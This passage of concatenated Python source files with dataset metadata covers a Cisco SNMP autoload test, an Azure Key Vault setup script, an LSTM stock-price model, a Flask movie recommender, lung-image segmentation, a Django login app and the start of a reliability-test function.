self.cisco_snmp_autoload._get_device_model_name(model_name)\n get_dev_name_mock.called_once_with(model_name)\n\n @patch(\"cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload.SnmpIfTable\")\n @patch(\"cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload.CiscoSNMPEntityTable\")\n def test_load_snmp_tables(self, snmp_ent_tbl_mock, snmp_if_tbl_mock):\n snmp_ent_tbl_mock.get_entity_table.return_value = QualiMibTable(\"EntPhysicalTable\", {1: {\"entPhysicalClass\": \"chassis\"}})\n self.cisco_snmp_autoload._load_snmp_tables()\n snmp_if_tbl_mock.return_value.called_once_with(self._snmp_handler, self._logger)\n snmp_ent_tbl_mock.return_value.called_once_with(self._snmp_handler, self._logger, snmp_if_tbl_mock)\n snmp_ent_tbl_mock.return_value.get_entity_table.called_once()\n\n def test_add_element(self):\n uniqe_id = \"{}.{}.{}\".format(self._resource_name, \"chassis\", \"some_id\")\n relative_path = \"0\"\n chassis = GenericChassis(shell_name=self._shell_name,\n name=\"Chassis {}\".format(0),\n unique_id=\"{}.{}.{}\".format(self._resource_name, \"chassis\", uniqe_id))\n self.cisco_snmp_autoload._add_element(relative_path, chassis)\n self.assertTrue(self.cisco_snmp_autoload.elements[relative_path] == chassis)\n self.assertTrue(self.cisco_snmp_autoload.resource.resources[\"CH\"][relative_path][-1] == chassis)\n port_relative_path = \"0/0\"\n port_uniqe_id = \"{}.{}.{}\".format(self._resource_name, \"port\", \"some_id\")\n port = GenericPort(shell_name=self._shell_name,\n name=\"GigabitEthernet {}\".format(port_relative_path),\n unique_id=\"{}.{}.{}\".format(self._resource_name, \"port\", port_uniqe_id))\n self.cisco_snmp_autoload._add_element(port_relative_path, port)\n self.assertTrue(self.cisco_snmp_autoload.elements[port_relative_path] == port)\n self.assertTrue(self.cisco_snmp_autoload.resource.resources[\"CH\"][relative_path][-1].resources[\"P\"][relative_path][-1])\n\n def test_discovery(self):\n pass\n", "sub_path": "tests/networking/cisco/autoload/test_cisco_snmp_autoload.py", "file_name": "test_cisco_snmp_autoload.py", "file_ext": "py", "file_size_in_byte": 5316, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 10, "usage_type": 
"call"}, {"api_name": "mock.MagicMock", "line_number": 13, "usage_type": "call"}, {"api_name": "cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload.CiscoGenericSNMPAutoload", "line_number": 15, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 68, "usage_type": "call"}, {"api_name": "cloudshell.snmp.quali_snmp.QualiMibTable", "line_number": 76, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 73, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 74, "usage_type": "call"}, {"api_name": "cloudshell.devices.standards.networking.autoload_structure.GenericChassis", "line_number": 85, "usage_type": "call"}, {"api_name": "cloudshell.devices.standards.networking.autoload_structure.GenericPort", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "121233864", "text": "import os\n\nfrom msrestazure.azure_active_directory import ServicePrincipalCredentials\nimport os\nimport json\nfrom azure.common.credentials import ServicePrincipalCredentials\nfrom azure.mgmt.keyvault import KeyVaultManagementClient\nfrom azure.mgmt.resource.resources import ResourceManagementClient\n\n# The object ID of the User or Application for access policies. Find this number in the portal\ndef create_keyvault(KV_NAME, GROUP_NAME, OBJECT_ID, location):\n subscription_id = os.environ['SUB']\n\n credentials = ServicePrincipalCredentials(\n client_id=os.environ['CLIENT'],\n secret=os.environ['KEY'],\n tenant=os.environ['TENANT']\n )\n kv_client = KeyVaultManagementClient(credentials, subscription_id)\n resource_client = ResourceManagementClient(credentials, subscription_id)\n\n # You MIGHT need to add KeyVault as a valid provider for these credentials\n # If so, this operation has to be done only once for each credentials\n resource_client.providers.register('Microsoft.KeyVault')\n\n # Create Resource group\n\n resource_group_params = {'location': location}\n resource_client.resource_groups.create_or_update(\n GROUP_NAME, resource_group_params)\n\n # Create a vault\n\n vault = kv_client.vaults.create_or_update(\n GROUP_NAME,\n KV_NAME,\n {\n 'location': location,\n 'properties': {\n 'sku': {\n 'name': 'standard'\n },\n 'tenant_id': os.environ['TENANT'],\n 'access_policies': [{\n 'tenant_id': os.environ['TENANT'],\n 'object_id': OBJECT_ID,\n 'permissions': {\n 'keys': ['all'],\n 'secrets': ['all']\n }\n }]\n }\n }\n )\n", "sub_path": "src/mop/azure/utils/create_keyvault.py", "file_name": "create_keyvault.py", "file_ext": "py", "file_size_in_byte": 1843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "azure.common.credentials.ServicePrincipalCredentials", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 17, "usage_type": "attribute"}, {"api_name": "azure.mgmt.keyvault.KeyVaultManagementClient", "line_number": 19, "usage_type": "call"}, {"api_name": "azure.mgmt.resource.resources.ResourceManagementClient", "line_number": 20, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 45, "usage_type": "attribute"}]} +{"seq_id": "617089978", "text": "from __future__ import print_function\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV 
file I/O (e.g. pd.read_csv)\nfrom keras.layers.core import Dense, Activation, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.models import Sequential\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nimport math\nimport datetime as dt\n# do not display tensorflow warnings\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\n# parameters to be set (\"optimum\" hyperparameters obtained from grid search):\nlook_back = 7\nepochs = 100\nbatch_size = 32\n\n# fix random seed for reproducibility\nnp.random.seed(7)\n\n\n# read in the data using pandas\nprices_dataset = pd.read_csv('prices-split-adjusted.csv', header=0)\n\n# filter the data for Apple\napple = prices_dataset[prices_dataset['symbol']=='AAPL']\n# sort the data by date (day/month/year)\napple = apple.sort_values('date')\n\n\n# store Apple's stock prices as float32 values\napple_stock_prices = apple.close.values.astype('float32')\n\n# normalize the dataset to the range 0 to 1\nscaler = MinMaxScaler(feature_range=(0, 1))\n\napple_stock_prices = np.reshape(apple_stock_prices, (len(apple_stock_prices),1))\napple_stock_prices = scaler.fit_transform(apple_stock_prices)\n# split the dataset into train and test parts with a 0.67:0.33 ratio\ntrain_size = int(len(apple_stock_prices) * 0.67)\ntest_size = len(apple_stock_prices) - train_size\ntrain = apple_stock_prices[0:train_size,:]\ntest = apple_stock_prices[train_size:len(apple_stock_prices),:]\n\nprint('Split data into training set and test set... Number of training samples/ test samples:', len(train), len(test))\n\n# convert an array of values into a time series dataset\n# in form \n# X Y\n# t-look_back+1, t-look_back+2, ..., t t+1\n\ndef create_dataset(dataset, look_back):\n\tdataX, dataY = [], []\n\tfor i in range(len(dataset)-look_back-1):\n\t\ta = dataset[i:(i+look_back), 0]\n\t\tdataX.append(a)\n\t\tdataY.append(dataset[i + look_back, 0])\n\treturn np.array(dataX), np.array(dataY)\n\n# convert the Apple stock price array into a time series dataset\ntrainX, trainY = create_dataset(train, look_back)\ntestX, testY = create_dataset(test, look_back)\n\n# reshape the LSTM input into the format [samples, time steps, features]\ntrainX = np.reshape(trainX, (trainX.shape[0], trainX.shape[1], 1))\ntestX = np.reshape(testX, (testX.shape[0], testX.shape[1], 1))\n\n# create and fit the LSTM network\nmodel = Sequential()\nmodel.add(LSTM(5, input_shape=(look_back, 1)))\nmodel.add(Dense(1))\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(trainX, trainY, nb_epoch=epochs, batch_size=batch_size)\n\n# generate predictions\ntrainPredict = model.predict(trainX)\ntestPredict = model.predict(testX)\n\n\n# invert predictions and targets to unscaled\ntrainPredict = scaler.inverse_transform(trainPredict)\ntrainY = scaler.inverse_transform([trainY])\ntestPredict = scaler.inverse_transform(testPredict)\ntestY = scaler.inverse_transform([testY])\n\n# calculate the root mean squared error\ntrainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))\nprint('Train Score: %.2f RMSE' % (trainScore))\ntestScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))\nprint('Test Score: %.2f RMSE' % (testScore))\n\n# shift train predictions for plotting \ntrainPredictPlot = np.empty_like(apple_stock_prices)\ntrainPredictPlot[:, :] = np.nan\ntrainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict\n\n# shift test predictions for 
plotting\ntestPredictPlot = np.empty_like(apple_stock_prices)\ntestPredictPlot[:, :] = np.nan\ntestPredictPlot[len(trainPredict)+(look_back*2)+1:len(apple_stock_prices)-1, :] = testPredict\n\n# plot the baseline and the predictions\nplt.plot(scaler.inverse_transform(apple_stock_prices),color='b', lw=2.0, label='S&P 500')\nplt.plot(trainPredictPlot,color='g', lw=2.0, label='LSTM train')\nplt.plot(testPredictPlot,color='r', lw=2.0, label='LSTM test')\nplt.legend(loc=3)\nplt.grid(True)\nplt.show()\n\n\n\n", "sub_path": "CodeDemo/LSTMforRegression.py", "file_name": "LSTMforRegression.py", "file_ext": "py", "file_size_in_byte": 4273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 75, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 91, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 98, "usage_type": "attribute"}, {"api_name": "numpy.empty_like", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 103, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}]} +{"seq_id": "360943889", "text": "from flask import Flask, render_template, request\r\nimport pickle\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom flask_table import Table, Col\r\n\r\n#building flask table for showing recommendation results\r\nclass Results(Table):\r\n id = Col('Id', 
show=False)\r\n title = Col('Recommendation List')\r\n\r\napp = Flask(__name__)\r\n\r\n#Welcome Page\r\n@app.route(\"/\")\r\ndef welcome():\r\n return render_template('welcome.html')\r\n\r\n#Rating Page\r\n@app.route(\"/rating\", methods=[\"GET\", \"POST\"])\r\ndef rating():\r\n if request.method==\"POST\":\r\n return render_template('recommendation.html')\r\n return render_template('rating.html')\r\n\r\n#Results Page\r\n@app.route(\"/recommendation\", methods=[\"GET\", \"POST\"])\r\ndef recommendation():\r\n if request.method == 'POST':\r\n #reading the original dataset\r\n #movies = pd.read_csv('movies.csv')\r\n\r\n #separating genres for each movie\r\n #movies = pd.concat([movies, movies.genres.str.get_dummies(sep='|')], axis=1)\r\n\r\n #dropping variables to have a dummy 1-0 matrix of movies and their genres\r\n ## IMAX is not a genre, it is a specific method of filming a movie, thus removed\r\n ###we do not need movieId for this project\r\n #categories = movies.drop(['title', 'genres', 'IMAX', 'movieId'], axis=1)\r\n\r\n #initializing user preference list which will contain user ratings\r\n \r\n with open('corrmatrix.pickle', 'rb') as f:\r\n corrmatrix = pickle.load(f)\r\n \r\n corrMatrix = corrmatrix['rating'].droplevel(level=0)\r\n \r\n \r\n \r\n movies_list = [\r\n 'Bad Boys (1995)',\r\n 'Firewalker (1986)',\r\n 'Toy Story (1995)',\r\n 'Alice in Wonderland (1951)',\r\n 'My Chauffeur (1986)',\r\n 'Gang Related (1997)',\r\n \"Jupiter's Wife (1994)\",\r\n 'Godfather, The (1972)',\r\n 'American Pimp (1999)',\r\n \"Killer's Kiss (1955)\",\r\n 'Baraka (1992)',\r\n 'King and I, The (1956)',\r\n \"Mike's Murder (1984)\",\r\n 'Love Is a Many-Splendored Thing (1955)',\r\n \"Star Wars: Episode I - The Phantom Menace (1999)\",\r\n 'Braveheart (1995)',\r\n 'Seven (Se7en) (1995)',\r\n 'Good, The Bad and The Ugly, The (1966)']\r\n \r\n preferences = []\r\n\r\n #reading rating values given by user in the front-end\r\n Action = request.form.get('Action')\r\n Adventure = request.form.get('Adventure')\r\n Animation = request.form.get('Animation')\r\n Children = request.form.get('Children')\r\n Comedy = request.form.get('Comedy')\r\n Crime = request.form.get('Crime')\r\n Documentary = request.form.get('Documentary')\r\n Drama = request.form.get('Drama')\r\n Fantasy = request.form.get('Fantasy')\r\n FilmNoir = request.form.get('FilmNoir')\r\n Horror = request.form.get('Horror')\r\n Musical = request.form.get('Musical')\r\n Mystery = request.form.get('Mystery')\r\n Romance = request.form.get('Romance')\r\n SciFi = request.form.get('SciFi')\r\n Thriller = request.form.get('Thriller')\r\n War = request.form.get('War')\r\n Western = request.form.get('Western')\r\n\r\n #inserting each rating in a specific position based on the movie-genre matrix\r\n preferences.append(int(Action))\r\n preferences.append(int(Adventure))\r\n preferences.append(int(Animation))\r\n preferences.append(int(Children))\r\n preferences.append(int(Comedy))\r\n preferences.append(int(Crime))\r\n preferences.append(int(Documentary))\r\n preferences.append(int(Drama))\r\n preferences.append(int(Fantasy))\r\n preferences.append(int(FilmNoir))\r\n preferences.append(int(Horror))\r\n preferences.append(int(Musical))\r\n preferences.append(int(Mystery))\r\n preferences.append(int(Romance))\r\n preferences.append(int(SciFi))\r\n preferences.append(int(War))\r\n preferences.append(int(Thriller))\r\n preferences.append(int(Western))\r\n\r\n #pairing each movie with the rating the user gave it\r\n 
tuple_movie_n_rating = list(zip(movies_list,preferences))\r\n\r\n #Generating recommendations based on top score movies\r\n def get_similar(movie_name,rating):\r\n similar_ratings = corrMatrix[movie_name]*(rating-2.5)\r\n similar_ratings = similar_ratings.sort_values(ascending=False)\r\n #print(type(similar_ratings))\r\n return similar_ratings\r\n \r\n def recommendations(list_of_tuple):\r\n similar_movies = pd.DataFrame()\r\n for movie,rating in list_of_tuple:\r\n similar_movies = similar_movies.append(get_similar(movie,rating),ignore_index = True)\r\n \r\n mann = similar_movies.sum().sort_values(ascending=False).index.values\r\n return [m for m in mann if not m in movies_list][:20] \r\n\r\n #def recommendations(X, n_recommendations):\r\n #movies['score'] = get_score(categories, preferences)\r\n #return movies.sort_values(by=['score'], ascending=False)['title'][:n_recommendations]\r\n\r\n #printing top-20 recommendations\r\n output= recommendations(tuple_movie_n_rating)\r\n table = Results(output)\r\n table.border = True\r\n return render_template('recommendation.html', table=table)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)", "sub_path": "Movie_Recommender.py", "file_name": "Movie_Recommender.py", "file_ext": "py", "file_size_in_byte": 5503, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_table.Table", "line_number": 8, "usage_type": "name"}, {"api_name": "flask_table.Col", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_table.Col", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 78, "usage_type": 
"call"}, {"api_name": "flask.request.form", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "106270402", "text": "import itertools\n\nimport numpy as np\nfrom scipy import ndimage\nfrom skimage.filters import sobel\nfrom skimage.filters import threshold_otsu\nfrom skimage.measure import label, regionprops\nfrom skimage.morphology import binary_dilation\nfrom skimage.morphology import disk, binary_erosion\nfrom skimage.segmentation import clear_border\n\n\ndef segment_lungs(im):\n \"\"\"\n 
Using a 2D image as input (in the form of an array), this function will generate a binary mask and an output image that both only show the lungs.\n \"\"\"\n ##### BINARIZE IMAGE\n # first anything <0 (as some images are negative)\n im_b = np.where(im < 0, 0, im)\n # then based on otsu thresholding\n thresh = threshold_otsu(im_b)\n binary = im_b > thresh\n\n # invert the image to make the lungs the ROIs\n binary = np.invert(binary)\n\n ##### GENERATE BORDER OF THE BINARIES\n cleared = clear_border(binary)\n\n ##### LABEL DISTINCT BODIES IN IMAGE\n label_image = label(cleared)\n\n ##### KEEP TWO LARGEST AREAS\n areas = [r.area for r in regionprops(label_image)]\n areas.sort()\n if len(areas) > 2:\n for region in regionprops(label_image):\n if region.area < areas[-2]:\n for coordinates in region.coords:\n label_image[coordinates[0], coordinates[1]] = 0\n binary = label_image > 0\n\n ##### EROSION TO GET RID OF ARTIFACTS\n selem = disk(4)\n binary = binary_erosion(binary, selem)\n\n ##### DILATION TO BRING BACK LUNG INFORMATION\n selem = disk(4)\n binary = binary_dilation(binary, selem)\n\n ##### FILL SMALL HOLES\n edges = sobel(binary)\n binary = ndimage.binary_fill_holes(edges)\n\n return binary\n\n\ndef bbox2_ND(img):\n \"\"\"\n Generates a bounding box for 3D image.\n \"\"\"\n N = img.ndim\n out = []\n for ax in itertools.combinations(range(N), N - 1):\n nonzero = np.any(img, axis=ax)\n out.extend(np.where(nonzero)[0][[0, -1]])\n b = tuple(out)\n img_roi = img[b[4]:b[5], b[2]:b[3], b[0]:b[1]]\n return img_roi\n", "sub_path": "utils/preprocessing_utils.py", "file_name": "preprocessing_utils.py", "file_ext": "py", "file_size_in_byte": 2018, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.where", "line_number": 19, "usage_type": "call"}, {"api_name": "skimage.filters.threshold_otsu", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.invert", "line_number": 25, "usage_type": "call"}, {"api_name": "skimage.segmentation.clear_border", "line_number": 28, "usage_type": "call"}, {"api_name": "skimage.measure.label", "line_number": 31, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 34, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 37, "usage_type": "call"}, {"api_name": "skimage.morphology.disk", "line_number": 44, "usage_type": "call"}, {"api_name": "skimage.morphology.binary_erosion", "line_number": 45, "usage_type": "call"}, {"api_name": "skimage.morphology.disk", "line_number": 48, "usage_type": "call"}, {"api_name": "skimage.morphology.binary_dilation", "line_number": 49, "usage_type": "call"}, {"api_name": "skimage.filters.sobel", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.ndimage.binary_fill_holes", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 53, "usage_type": "name"}, {"api_name": "itertools.combinations", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "112783323", "text": "from django.shortcuts import render, redirect\nimport bcrypt\nfrom .models import *\nfrom django.contrib import messages\n\n# Create your views here.\ndef index(request):\n \n return render(request, \"users/index.html\")\n\n#######################\n# REGISTER NEW USER\n#####################\ndef process_reg(request):\n errors = 
User.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect(\"/\")\n else:\n hash1 = bcrypt.hashpw(request.POST[\"pw\"].encode(), bcrypt.gensalt())\n new_user = User.objects.create(first_name=request.POST[\"fname\"], last_name=request.POST[\"lname\"],email=request.POST[\"email\"],pw_hash=hash1)\n request.session[\"userid\"] = new_user.id\n messages.success(request, \"Successfully registered!\")\n return redirect(\"/success\")\n\n#########################\n# AJAX EMAIL VALIDATION\n########################\ndef email(request):\n found = False\n result = User.objects.filter(email=request.POST[\"email\"])\n if len(result) > 0:\n found = True\n context = {\n \"found_html\": found\n }\n return render(request, \"users/partials/email.html\", context)\n\n#######################\n# DISPLAY SUCCESS PAGE\n#######################\ndef success(request):\n if not \"userid\" in request.session:\n messages.error(request, \"You are not logged in.\")\n return redirect(\"/\")\n else:\n user = User.objects.get(id=request.session[\"userid\"])\n context = {\n \"user_html\": user\n }\n return render(request, \"users/success.html\", context)\n\n#######################\n# LOGIN\n######################\ndef login(request):\n # email match?\n try:\n User.objects.get(email=request.POST[\"email\"])\n except:\n messages.error(request,\"User does not exist.\")\n return redirect(\"/\")\n email_match = User.objects.get(email=request.POST[\"email\"]) \n if bcrypt.checkpw(request.POST[\"pw\"].encode(), email_match.pw_hash.encode()):\n request.session[\"userid\"] = email_match.id\n messages.success(request, \"Successfully logged in!\")\n return redirect(\"/success\")\n else:\n messages.error(request, \"Incorrect password.\")\n return redirect(\"/\")\n\n#########################\n# LOGOUT\n##########################\ndef logout(request):\n request.session.clear()\n return redirect(\"/\")", "sub_path": "login_reg/apps/users/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 18, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 19, "usage_type": "call"}, {"api_name": "bcrypt.hashpw", "line_number": 21, "usage_type": "call"}, {"api_name": "bcrypt.gensalt", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 45, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 46, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 62, "usage_type": "name"}, {"api_name": 
"django.shortcuts.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "bcrypt.checkpw", "line_number": 65, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 67, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 68, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 70, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 70, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "297589009", "text": "\nimport numpy as np\nimport scipy.stats as spstats\nimport scipy.optimize as spopt\n\n\ndef fixed_length_test(lbd0, lbd1, T):\n \"\"\"Fixed Length Reliability Demonstration Test.\n\n Args:\n lbd0 (float): failure rate [time^-1].\n lbd1 (float): failure rate [time^-1].\n T (float): total observation period [time]\n Returns:\n the maximum number of acceptable failures,\n the discrimination ratio of the hypothesis test\n the producer's risk alpha\n the consumer's risk beta\n\n so that either:\n - the producer's risk is equal to the consumer's risk and it is a small\n as possible (within the constraints)\n - or, if the above is not possible, then the absolute value of the\n difference between the two risks is minimized\n\n The solution method is based on the following facts:\n 1.- for a fixed time test alpha is a decreasing function of c\n 2.- for a fixed time test beta is an increasing function of c\n 3.- for a fixed time test beta is a decreasing function of the\n discrimination ratio\n 4.- because of 1, 2 and 3 for a given c there are three possibilities:\n i.- alpha > beta_max > beta_min\n ii.- beta_max > alpha > beta_min\n iii.- beta_max > beta_min > alpha\n 5.- Furthermore, as c increases you always move towards iii, i.e. 
